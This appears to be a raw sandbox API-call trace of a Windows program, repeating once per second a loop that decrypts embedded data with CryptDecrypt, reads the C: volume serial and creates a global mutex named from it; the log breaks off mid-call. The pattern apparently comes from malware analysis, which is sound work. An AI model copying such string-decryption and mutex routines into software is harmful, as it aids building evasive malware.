1 [0114.689] Sleep (dwMilliseconds=0x3e8) [0115.821] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x20) returned 0x1db9af0 [0115.821] CryptImportKey (in: hProv=0x254d70, pbData=0x200fad8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb40 | out: phKey=0x200fb40*=0x29c220) returned 1 [0115.821] CryptSetKeyParam (hKey=0x29c220, dwParam=0x1, pbData=0x200fb28, dwFlags=0x0) returned 1 [0115.821] CryptDecrypt (in: hKey=0x29c220, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db9af0, pdwDataLen=0x200faf4 | out: pbData=0x1db9af0, pdwDataLen=0x200faf4) returned 1 [0115.821] CryptDestroyKey (hKey=0x29c220) returned 1 [0115.821] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x1e) returned 0x1db9b18 [0115.821] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x1e) returned 0x1db9b40 [0115.821] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x90) returned 0x1db9b68 [0115.821] CryptImportKey (in: hProv=0x254d70, pbData=0x200fab0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb18 | out: phKey=0x200fb18*=0x29c220) returned 1 [0115.821] CryptSetKeyParam (hKey=0x29c220, dwParam=0x1, pbData=0x200fb00, dwFlags=0x0) returned 1 [0115.821] CryptDecrypt (in: hKey=0x29c220, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db9b68, pdwDataLen=0x200facc | out: pbData=0x1db9b68, pdwDataLen=0x200facc) returned 1 [0115.821] CryptDestroyKey (hKey=0x29c220) returned 1 [0115.821] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db9b68 | out: hHeap=0x1db0000) returned 1 [0115.821] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x1db9b18, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0115.821] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db9b40 | out: hHeap=0x1db0000) returned 1 [0115.821] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db9af0 | out: hHeap=0x1db0000) returned 1 [0115.821] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x200fb80, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x200fb80*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0115.821] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db9b18 | out: hHeap=0x1db0000) returned 1 [0115.821] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x40) returned 0x1db9af0 [0115.821] CryptImportKey (in: hProv=0x254d70, pbData=0x200fb0c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb74 | out: phKey=0x200fb74*=0x29c220) returned 1 [0115.821] CryptSetKeyParam (hKey=0x29c220, dwParam=0x1, pbData=0x200fb5c, dwFlags=0x0) returned 1 [0115.822] CryptDecrypt (in: hKey=0x29c220, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db9af0, pdwDataLen=0x200fb28 | out: pbData=0x1db9af0, pdwDataLen=0x200fb28) returned 1 [0115.822] CryptDestroyKey (hKey=0x29c220) returned 1 [0115.822] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x34) returned 0x1db9b38 [0115.822] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4201") returned 0x0 [0115.822] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="Global\\00019C354B4201") returned 0x2bc [0115.822] WaitForSingleObject (hHandle=0x2bc, dwMilliseconds=0x0) returned 0x0 [0115.822] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db9af0 | out: hHeap=0x1db0000) returned 1 [0115.822] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db9b38 | out: hHeap=0x1db0000) returned 1 [0115.822] ReleaseMutex (hMutex=0x2bc) returned 1 [0115.822] CloseHandle (hObject=0x2bc) returned 1 [0115.822] Sleep (dwMilliseconds=0x3e8) [0116.989] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x20) returned 0x1db9af0 [0116.989] CryptImportKey (in: hProv=0x254d70, pbData=0x200fad8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb40 | out: phKey=0x200fb40*=0x29c1e0) returned 1 [0116.989] CryptSetKeyParam (hKey=0x29c1e0, dwParam=0x1, pbData=0x200fb28, dwFlags=0x0) returned 1 [0116.989] CryptDecrypt (in: hKey=0x29c1e0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db9af0, pdwDataLen=0x200faf4 | out: pbData=0x1db9af0, pdwDataLen=0x200faf4) returned 1 [0116.989] CryptDestroyKey (hKey=0x29c1e0) returned 1 [0116.989] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x1e) returned 0x1db9b18 [0116.989] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x1e) returned 0x1db9b40 [0116.989] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x90) returned 0x1db9b68 [0116.989] CryptImportKey (in: hProv=0x254d70, pbData=0x200fab0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb18 | out: phKey=0x200fb18*=0x29c1e0) returned 1 [0116.989] CryptSetKeyParam (hKey=0x29c1e0, dwParam=0x1, pbData=0x200fb00, dwFlags=0x0) returned 1 [0116.989] CryptDecrypt (in: hKey=0x29c1e0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db9b68, pdwDataLen=0x200facc | out: pbData=0x1db9b68, pdwDataLen=0x200facc) returned 1 [0116.989] CryptDestroyKey (hKey=0x29c1e0) returned 1 [0116.989] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db9b68 | out: hHeap=0x1db0000) returned 1 [0116.989] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x1db9b18, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0116.989] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db9b40 | out: hHeap=0x1db0000) returned 1 [0116.989] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db9af0 | out: hHeap=0x1db0000) returned 1 [0116.989] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x200fb80, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x200fb80*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0116.989] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db9b18 | out: hHeap=0x1db0000) returned 1 [0116.989] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x40) returned 0x1db9af0 [0116.989] CryptImportKey (in: hProv=0x254d70, pbData=0x200fb0c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb74 | out: phKey=0x200fb74*=0x29c1e0) returned 1 [0116.989] CryptSetKeyParam (hKey=0x29c1e0, dwParam=0x1, pbData=0x200fb5c, dwFlags=0x0) returned 1 [0116.989] CryptDecrypt (in: hKey=0x29c1e0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db9af0, pdwDataLen=0x200fb28 | out: pbData=0x1db9af0, pdwDataLen=0x200fb28) returned 1 [0116.989] CryptDestroyKey (hKey=0x29c1e0) returned 1 [0116.989] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x34) returned 0x1db9b38 [0116.989] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4201") returned 0x0 [0116.989] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="Global\\00019C354B4201") returned 0x2ac [0116.989] WaitForSingleObject (hHandle=0x2ac, dwMilliseconds=0x0) returned 0x0 [0116.990] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db9af0 | out: hHeap=0x1db0000) returned 1 [0116.990] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db9b38 | out: hHeap=0x1db0000) returned 1 [0116.990] ReleaseMutex (hMutex=0x2ac) returned 1 [0116.990] CloseHandle (hObject=0x2ac) returned 1 [0116.990] Sleep (dwMilliseconds=0x3e8) [0118.002] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x20) returned 0x1db9af0 [0118.002] CryptImportKey (in: hProv=0x254d70, pbData=0x200fad8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb40 | out: phKey=0x200fb40*=0x29c1e0) returned 1 [0118.002] CryptSetKeyParam (hKey=0x29c1e0, dwParam=0x1, pbData=0x200fb28, dwFlags=0x0) returned 1 [0118.002] CryptDecrypt (in: hKey=0x29c1e0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db9af0, pdwDataLen=0x200faf4 | out: pbData=0x1db9af0, pdwDataLen=0x200faf4) returned 1 [0118.002] CryptDestroyKey (hKey=0x29c1e0) returned 1 [0118.002] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x1e) returned 0x1db9b18 [0118.002] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x1e) returned 0x1db9b40 [0118.002] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x90) returned 0x1db9b68 [0118.002] CryptImportKey (in: hProv=0x254d70, pbData=0x200fab0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb18 | out: phKey=0x200fb18*=0x29c1e0) returned 1 [0118.002] CryptSetKeyParam (hKey=0x29c1e0, dwParam=0x1, pbData=0x200fb00, dwFlags=0x0) returned 1 [0118.002] CryptDecrypt (in: hKey=0x29c1e0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db9b68, pdwDataLen=0x200facc | out: pbData=0x1db9b68, pdwDataLen=0x200facc) returned 1 [0118.002] CryptDestroyKey (hKey=0x29c1e0) returned 1 [0118.002] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db9b68 | out: hHeap=0x1db0000) returned 1 [0118.002] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x1db9b18, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0118.002] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db9b40 | out: hHeap=0x1db0000) returned 1 [0118.002] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db9af0 | out: hHeap=0x1db0000) returned 1 [0118.002] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x200fb80, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x200fb80*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0118.002] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db9b18 | out: hHeap=0x1db0000) returned 1 [0118.002] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x40) returned 0x1db9af0 [0118.002] CryptImportKey (in: hProv=0x254d70, pbData=0x200fb0c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb74 | out: phKey=0x200fb74*=0x29c1e0) returned 1 [0118.002] CryptSetKeyParam (hKey=0x29c1e0, dwParam=0x1, pbData=0x200fb5c, dwFlags=0x0) returned 1 [0118.002] CryptDecrypt (in: hKey=0x29c1e0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db9af0, pdwDataLen=0x200fb28 | out: pbData=0x1db9af0, pdwDataLen=0x200fb28) returned 1 [0118.002] CryptDestroyKey (hKey=0x29c1e0) returned 1 [0118.002] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x34) returned 0x1db9b38 [0118.002] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4201") returned 0x0 [0118.003] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="Global\\00019C354B4201") returned 0x2ac [0118.003] WaitForSingleObject (hHandle=0x2ac, dwMilliseconds=0x0) returned 0x0 [0118.003] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db9af0 | out: hHeap=0x1db0000) returned 1 [0118.003] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db9b38 | out: hHeap=0x1db0000) returned 1 [0118.003] ReleaseMutex (hMutex=0x2ac) returned 1 [0118.003] CloseHandle (hObject=0x2ac) returned 1 [0118.003] Sleep (dwMilliseconds=0x3e8) [0119.120] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x20) returned 0x1db9af0 [0119.120] CryptImportKey (in: hProv=0x254d70, pbData=0x200fad8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb40 | out: phKey=0x200fb40*=0x29c1e0) returned 1 [0119.120] CryptSetKeyParam (hKey=0x29c1e0, dwParam=0x1, pbData=0x200fb28, dwFlags=0x0) returned 1 [0119.120] CryptDecrypt (in: hKey=0x29c1e0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db9af0, pdwDataLen=0x200faf4 | out: pbData=0x1db9af0, pdwDataLen=0x200faf4) returned 1 [0119.120] CryptDestroyKey (hKey=0x29c1e0) returned 1 [0119.120] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x1e) returned 0x1db9b18 [0119.120] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x1e) returned 0x1db9b40 [0119.120] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x90) returned 0x1db9b68 [0119.120] CryptImportKey (in: hProv=0x254d70, pbData=0x200fab0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb18 | out: phKey=0x200fb18*=0x29c1e0) returned 1 [0119.120] CryptSetKeyParam (hKey=0x29c1e0, dwParam=0x1, pbData=0x200fb00, dwFlags=0x0) returned 1 [0119.120] CryptDecrypt (in: hKey=0x29c1e0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db9b68, pdwDataLen=0x200facc | out: pbData=0x1db9b68, pdwDataLen=0x200facc) returned 1 [0119.120] CryptDestroyKey (hKey=0x29c1e0) returned 1 [0119.120] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db9b68 | out: hHeap=0x1db0000) returned 1 [0119.120] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x1db9b18, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0119.120] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db9b40 | out: hHeap=0x1db0000) returned 1 [0119.120] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db9af0 | out: hHeap=0x1db0000) returned 1 [0119.120] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x200fb80, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x200fb80*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0119.121] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db9b18 | out: hHeap=0x1db0000) returned 1 [0119.121] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x40) returned 0x1db9af0 [0119.121] CryptImportKey (in: hProv=0x254d70, pbData=0x200fb0c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb74 | out: phKey=0x200fb74*=0x29c1e0) returned 1 [0119.121] CryptSetKeyParam (hKey=0x29c1e0, dwParam=0x1, pbData=0x200fb5c, dwFlags=0x0) returned 1 [0119.121] CryptDecrypt (in: hKey=0x29c1e0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db9af0, pdwDataLen=0x200fb28 | out: pbData=0x1db9af0, pdwDataLen=0x200fb28) returned 1 [0119.121] CryptDestroyKey (hKey=0x29c1e0) returned 1 [0119.121] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x34) returned 0x1db9b38 [0119.121] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4201") returned 0x0 [0119.121] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="Global\\00019C354B4201") returned 0x2ac [0119.121] WaitForSingleObject (hHandle=0x2ac, dwMilliseconds=0x0) returned 0x0 [0119.121] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db9af0 | out: hHeap=0x1db0000) returned 1 [0119.121] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db9b38 | out: hHeap=0x1db0000) returned 1 [0119.121] ReleaseMutex (hMutex=0x2ac) returned 1 [0119.121] CloseHandle (hObject=0x2ac) returned 1 [0119.121] Sleep (dwMilliseconds=0x3e8) [0120.157] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x20) returned 0x1db9af0 [0120.157] CryptImportKey (in: hProv=0x254d70, pbData=0x200fad8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb40 | out: phKey=0x200fb40*=0x29c1e0) returned 1 [0120.157] CryptSetKeyParam (hKey=0x29c1e0, dwParam=0x1, pbData=0x200fb28, dwFlags=0x0) returned 1 [0120.157] CryptDecrypt (in: hKey=0x29c1e0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db9af0, pdwDataLen=0x200faf4 | out: pbData=0x1db9af0, pdwDataLen=0x200faf4) returned 1 [0120.157] CryptDestroyKey (hKey=0x29c1e0) returned 1 [0120.157] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x1e) returned 0x1db9b18 [0120.157] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x1e) returned 0x1db9b40 [0120.157] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x90) returned 0x1db9b68 [0120.157] CryptImportKey (in: hProv=0x254d70, pbData=0x200fab0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb18 | out: phKey=0x200fb18*=0x29c1e0) returned 1 [0120.157] CryptSetKeyParam (hKey=0x29c1e0, dwParam=0x1, pbData=0x200fb00, dwFlags=0x0) returned 1 [0120.157] CryptDecrypt (in: hKey=0x29c1e0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db9b68, pdwDataLen=0x200facc | out: pbData=0x1db9b68, pdwDataLen=0x200facc) returned 1 [0120.157] CryptDestroyKey (hKey=0x29c1e0) returned 1 [0120.157] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db9b68 | out: hHeap=0x1db0000) returned 1 [0120.157] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x1db9b18, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0120.157] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db9b40 | out: hHeap=0x1db0000) returned 1 [0120.157] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db9af0 | out: hHeap=0x1db0000) returned 1 [0120.158] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x200fb80, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x200fb80*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0120.158] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db9b18 | out: hHeap=0x1db0000) returned 1 [0120.158] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x40) returned 0x1db9af0 [0120.158] CryptImportKey (in: hProv=0x254d70, pbData=0x200fb0c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb74 | out: phKey=0x200fb74*=0x29c1e0) returned 1 [0120.158] CryptSetKeyParam (hKey=0x29c1e0, dwParam=0x1, pbData=0x200fb5c, dwFlags=0x0) returned 1 [0120.158] CryptDecrypt (in: hKey=0x29c1e0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db9af0, pdwDataLen=0x200fb28 | out: pbData=0x1db9af0, pdwDataLen=0x200fb28) returned 1 [0120.158] CryptDestroyKey (hKey=0x29c1e0) returned 1 [0120.158] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x34) returned 0x1db9b38 [0120.158] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4201") returned 0x0 [0120.158] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="Global\\00019C354B4201") returned 0x2b8 [0120.158] WaitForSingleObject (hHandle=0x2b8, dwMilliseconds=0x0) returned 0x0 [0120.158] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db9af0 | out: hHeap=0x1db0000) returned 1 [0120.158] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db9b38 | out: hHeap=0x1db0000) returned 1 [0120.158] ReleaseMutex (hMutex=0x2b8) returned 1 [0120.158] CloseHandle (hObject=0x2b8) returned 1 [0120.158] Sleep (dwMilliseconds=0x3e8) [0121.312] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x20) returned 0x1db9af0 [0121.312] CryptImportKey (in: hProv=0x254d70, pbData=0x200fad8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb40 | out: phKey=0x200fb40*=0x29c160) returned 1 [0121.312] CryptSetKeyParam (hKey=0x29c160, dwParam=0x1, pbData=0x200fb28, dwFlags=0x0) returned 1 [0121.312] CryptDecrypt (in: hKey=0x29c160, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db9af0, pdwDataLen=0x200faf4 | out: pbData=0x1db9af0, pdwDataLen=0x200faf4) returned 1 [0121.312] CryptDestroyKey (hKey=0x29c160) returned 1 [0121.313] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x1e) returned 0x1db9b18 [0121.313] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x1e) returned 0x1db9b40 [0121.313] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x90) returned 0x1db9b68 [0121.313] CryptImportKey (in: hProv=0x254d70, pbData=0x200fab0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb18 | out: phKey=0x200fb18*=0x29c160) returned 1 [0121.313] CryptSetKeyParam (hKey=0x29c160, dwParam=0x1, pbData=0x200fb00, dwFlags=0x0) returned 1 [0121.313] CryptDecrypt (in: hKey=0x29c160, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db9b68, pdwDataLen=0x200facc | out: pbData=0x1db9b68, pdwDataLen=0x200facc) returned 1 [0121.313] CryptDestroyKey (hKey=0x29c160) returned 1 [0121.313] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db9b68 | out: hHeap=0x1db0000) returned 1 [0121.313] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x1db9b18, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0121.313] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db9b40 | out: hHeap=0x1db0000) returned 1 [0121.313] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db9af0 | out: hHeap=0x1db0000) returned 1 [0121.313] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x200fb80, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x200fb80*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0121.313] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db9b18 | out: hHeap=0x1db0000) returned 1 [0121.313] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x40) returned 0x1db9af0 [0121.313] CryptImportKey (in: hProv=0x254d70, pbData=0x200fb0c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb74 | out: phKey=0x200fb74*=0x29c160) returned 1 [0121.313] CryptSetKeyParam (hKey=0x29c160, dwParam=0x1, pbData=0x200fb5c, dwFlags=0x0) returned 1 [0121.313] CryptDecrypt (in: hKey=0x29c160, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db9af0, pdwDataLen=0x200fb28 | out: pbData=0x1db9af0, pdwDataLen=0x200fb28) returned 1 [0121.313] CryptDestroyKey (hKey=0x29c160) returned 1 [0121.313] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x34) returned 0x1db9b38 [0121.313] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4201") returned 0x0 [0121.313] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="Global\\00019C354B4201") returned 0x2ac [0121.314] WaitForSingleObject (hHandle=0x2ac, dwMilliseconds=0x0) returned 0x0 [0121.314] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db9af0 | out: hHeap=0x1db0000) returned 1 [0121.314] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db9b38 | out: hHeap=0x1db0000) returned 1 [0121.314] ReleaseMutex (hMutex=0x2ac) returned 1 [0121.314] CloseHandle (hObject=0x2ac) returned 1 [0121.314] Sleep (dwMilliseconds=0x3e8) [0122.341] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x20) returned 0x1db9af0 [0122.341] CryptImportKey (in: hProv=0x254d70, pbData=0x200fad8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb40 | out: phKey=0x200fb40*=0x29c160) returned 1 [0122.341] CryptSetKeyParam (hKey=0x29c160, dwParam=0x1, pbData=0x200fb28, dwFlags=0x0) returned 1 [0122.341] CryptDecrypt (in: hKey=0x29c160, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db9af0, pdwDataLen=0x200faf4 | out: pbData=0x1db9af0, pdwDataLen=0x200faf4) returned 1 [0122.341] CryptDestroyKey (hKey=0x29c160) returned 1 [0122.341] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x1e) returned 0x1db9b18 [0122.341] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x1e) returned 0x1db9b40 [0122.341] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x90) returned 0x1db9b68 [0122.341] CryptImportKey (in: hProv=0x254d70, pbData=0x200fab0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb18 | out: phKey=0x200fb18*=0x29c160) returned 1 [0122.341] CryptSetKeyParam (hKey=0x29c160, dwParam=0x1, pbData=0x200fb00, dwFlags=0x0) returned 1 [0122.341] CryptDecrypt (in: hKey=0x29c160, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db9b68, pdwDataLen=0x200facc | out: pbData=0x1db9b68, pdwDataLen=0x200facc) returned 1 [0122.341] CryptDestroyKey (hKey=0x29c160) returned 1 [0122.341] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db9b68 | out: hHeap=0x1db0000) returned 1 [0122.341] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x1db9b18, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0122.341] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db9b40 | out: hHeap=0x1db0000) returned 1 [0122.341] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db9af0 | out: hHeap=0x1db0000) returned 1 [0122.341] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x200fb80, 